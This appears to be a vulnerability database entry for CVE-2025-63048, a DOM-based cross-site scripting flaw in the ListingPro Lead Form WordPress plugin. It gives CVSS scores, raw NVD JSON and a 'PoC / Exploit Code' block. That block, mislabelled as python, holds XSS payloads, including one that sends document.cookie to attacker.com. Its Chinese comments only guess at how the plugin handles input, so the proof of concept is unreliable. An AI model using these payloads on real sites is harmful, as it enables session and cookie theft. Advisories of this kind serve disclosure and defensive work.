Security Vulnerability Report
中文
CVE-2025-63048 CVSS 6.5 MEDIUM

CVE-2025-63048

Published: 2025-12-09 16:18:10
Last Modified: 2026-04-23 15:35:00

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows DOM-Based XSS.This issue affects ListingPro Lead Form: from n/a through <= 1.0.7.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

listingpro-lead-form <= 1.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- DOM型XSS PoC - CVE-2025-63048 --> <!-- 攻击者构造的恶意URL或表单输入 --> <!-- 通过URL参数注入 --> <script> // 恶意脚本会被插件的JavaScript代码处理并执行 var maliciousInput = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">"'; // 插件可能直接将此输入插入DOM而不进行编码 document.getElementById('lead-form-output').innerHTML = maliciousInput; </script> <!-- 简化版PoC - 通过表单输入触发 --> <!-- 在表单name字段输入: --> <img src=x onerror=alert(document.domain)> <!-- 通过URL触发: --> <!-- https://victim.com/page/?lead_name=<img src=x onerror=alert(document.cookie)>>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63048", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:10.163", "lastModified": "2026-04-23T15:35:00.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows DOM-Based XSS.This issue affects ListingPro Lead Form: from n/a through <= 1.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/listingpro-lead-form/vulnerability/wordpress-listingpro-lead-form-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}